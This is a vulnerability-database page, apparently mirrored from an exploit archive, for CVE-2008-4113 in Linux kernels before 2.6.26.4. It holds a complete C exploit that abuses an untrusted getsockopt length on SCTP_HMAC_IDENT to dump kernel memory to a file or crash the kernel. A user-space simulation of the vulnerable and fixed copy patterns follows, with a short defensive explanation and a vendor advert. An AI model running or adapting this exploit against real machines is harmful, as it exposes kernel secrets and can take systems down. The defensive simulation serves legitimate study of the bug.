Linux Kernel < 2.6.26.4 - SCTP Kernel Memory Disclosure Exploit

Reported by RootType, 01 Jul 2014 00:00:00 (source: seebug, www.seebug.org)

Linux Kernel < 2.6.26.4 SCTP Kernel Memory Disclosure Exploit by Jon Oberheid

Related entries (reporter: title, published):

- exploitpack: Linux Kernel 2.6.26.4 - SCTP Kernel Memory Disclosure, 29 Dec 2008 00:00
- cvelist: CVE-2008-4113, 16 Sep 2008 23:00
- cvelist: CVE-2008-4445, 6 Oct 2008 18:00
- seebug: Linux Kernel < 2.6.26.4 SCTP Kernel Memory Disclosure Exploit, 30 Dec 2008 00:00
- cve: CVE-2008-4113, 16 Sep 2008 23:00
- cve: CVE-2008-4445, 6 Oct 2008 19:54
- prion: Design/Logic Flaw, 16 Sep 2008 23:00
- prion: Design/Logic Flaw, 6 Oct 2008 19:54
- ubuntucve: CVE-2008-4113, 16 Sep 2008 00:00
- ubuntucve: CVE-2008-4445, 6 Oct 2008 00:00

/*
 * cve-2008-4113.c
 *
 * Linux Kernel < 2.6.26.4 SCTP kernel memory disclosure
 * Jon Oberheide <[email protected]>
 * http://jon.oberheide.org
 *
 * Information:
 *
 *   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4113
 *
 *   The sctp_getsockopt_hmac_ident function in net/sctp/socket.c in the Stream
 *   Control Transmission Protocol (sctp) implementation in the Linux kernel
 *   before 2.6.26.4, when the SCTP-AUTH extension is enabled, relies on an
 *   untrusted length value to limit copying of data from kernel memory, which
 *   allows local users to obtain sensitive information via a crafted
 *   SCTP_HMAC_IDENT IOCTL request involving the sctp_getsockopt function.
 *
 * Notes:
 *
 *   If SCTP AUTH is enabled (net.sctp.auth_enable = 1), this exploit allows an
 *   unprivileged user to dump an arbitrary amount (DUMP_SIZE) of kernel memory
 *   out to a file (DUMP_FILE). If SCTP AUTH is not enabled, the exploit will
 *   trigger a kernel OOPS.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/sctp.h>

#ifndef SCTP_HMAC_IDENT
#define SCTP_HMAC_IDENT 22
#endif

#define DUMP_SIZE (256*1024)
#define DUMP_FILE "mem.dump"

int
main(int argc, char **argv)
{
	int ret, sock;
	FILE *dumpfile;
	char *memdump, *err;
	socklen_t memlen = DUMP_SIZE;	/* attacker-chosen optlen passed to getsockopt */

	memdump = malloc(DUMP_SIZE);
	if (!memdump) {
		err = "malloc(3) failed";
		printf("[-] Error: %s (%s)\n", err, strerror(errno));
		return 1;
	}
	memset(memdump, 0, DUMP_SIZE);

	printf("[+] creating IPPROTO_SCTP socket\n");

	sock = socket(PF_INET, SOCK_STREAM, IPPROTO_SCTP);
	if (sock == -1) {
		err = "socket(2) failed";
		printf("[-] Error: %s (%s)\n", err, strerror(errno));
		return 1;
	}

	printf("[+] getting socket option SCTP_HMAC_IDENT with length of %u\n", memlen);

	/* vulnerable kernels copy memlen bytes out without checking it against the
	 * real size of the HMAC identifier list */
	ret = getsockopt(sock, SOL_SCTP, SCTP_HMAC_IDENT, memdump, &memlen);
	if (ret == -1) {
		err = "getsockopt(2) failed";
		printf("[-] Error: %s (%s)\n", err, strerror(errno));
		return 1;
	}

	printf("[+] dumping %u bytes of kernel memory to %s\n", memlen, DUMP_FILE);

	dumpfile = fopen(DUMP_FILE, "wb");
	if (!dumpfile) {
		err = "fopen(3) failed";
		printf("[-] Error: %s (%s)\n", err, strerror(errno));
		return 1;
	}
	fwrite(memdump, 1, memlen, dumpfile);
	fclose(dumpfile);

	printf("[+] done.\n");

	return 0;
}

// milw0rm.com [2008-12-29]
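The CVE text above describes the root cause: a getsockopt handler that uses the caller-supplied option length, rather than the real size of the HMAC identifier list, to bound a copy out of kernel memory. The following user-space simulation, added here as an illustration and not part of the original exploit or of the kernel's own code, places the vulnerable bounds pattern next to the hardened one. The struct layout, the `fake_kernel_hmacs` object, the "secret" bytes that follow the identifier list and the function names are all constructed stand-ins (assumptions), chosen only to make the difference observable in a test.

```c
#include <errno.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed stand-in for the kernel-side object: a count, the identifier
 * list, and (to model neighbouring kernel memory) data that must never be
 * copied to user space. This is NOT the real net/sctp layout. */
#define HMAC_COUNT 2
#define SECRET_LEN 32

struct fake_kernel_hmacs {
	uint16_t num_idents;			/* identifiers actually stored */
	uint16_t hmac_ids[HMAC_COUNT];		/* the list a caller may legitimately read */
	char secret[SECRET_LEN];		/* constructed "adjacent kernel memory" */
};

static struct fake_kernel_hmacs kstate = {
	.num_idents = HMAC_COUNT,
	.hmac_ids = { 1, 3 },
	.secret = "CONSTRUCTED-KERNEL-SECRET-DATA!",
};

/* Vulnerable pattern: optlen comes straight from the caller and is the only
 * limit on the copy. Returns the number of bytes written to out. */
size_t getopt_hmac_ident_vulnerable(void *out, size_t optlen)
{
	size_t off = offsetof(struct fake_kernel_hmacs, hmac_ids);
	const unsigned char *src = (const unsigned char *)&kstate + off;

	/* Cap only at the end of the simulated kernel object so this demo stays
	 * memory-safe; the real bug had no such cap inside kernel memory. */
	if (optlen > sizeof(kstate) - off)
		optlen = sizeof(kstate) - off;
	memcpy(out, src, optlen);		/* optlen untrusted: the defect */
	return optlen;
}

/* Hardened pattern: derive the length from the kernel's own record of how
 * many identifiers exist, reject buffers that are too small, and never copy
 * more than that. Returns bytes written; 0 with *err = EINVAL on a short
 * buffer. (Shape of the fix is an assumption, not the upstream patch.) */
size_t getopt_hmac_ident_fixed(void *out, size_t optlen, int *err)
{
	size_t data_len = (size_t)kstate.num_idents * sizeof(uint16_t);

	*err = 0;
	if (optlen < data_len) {
		*err = EINVAL;
		return 0;
	}
	memcpy(out, kstate.hmac_ids, data_len);	/* bounded by real data, not optlen */
	return data_len;
}

/* Detection helper for the test: does the returned buffer contain bytes from
 * the constructed secret region? */
int contains_secret(const unsigned char *buf, size_t n)
{
	static const char needle[] = "KERNEL-SECRET";
	size_t nl = sizeof(needle) - 1;
	size_t i;

	if (n < nl)
		return 0;
	for (i = 0; i + nl <= n; i++)
		if (memcmp(buf + i, needle, nl) == 0)
			return 1;
	return 0;
}

int main(void)
{
	unsigned char buf[64];
	size_t want = sizeof(kstate.hmac_ids) + SECRET_LEN;	/* oversized optlen */
	size_t n;
	int err;

	memset(buf, 0, sizeof(buf));
	n = getopt_hmac_ident_vulnerable(buf, want);
	printf("vulnerable: copied %zu bytes, secret leaked: %d\n",
	       n, contains_secret(buf, n));

	memset(buf, 0, sizeof(buf));
	n = getopt_hmac_ident_fixed(buf, want, &err);
	printf("fixed:      copied %zu bytes, secret leaked: %d\n",
	       n, contains_secret(buf, n));
	return 0;
}
```

The defender-side takeaway is the one the CVE text states: on a getsockopt path the option length is attacker-controlled and may only shrink a copy, never extend it past the size of the data the kernel actually holds. On kernels in the affected range, the page's own note gives the exposure condition to check (net.sctp.auth_enable = 1); the durable fix is the 2.6.26.4 update.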

                              

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo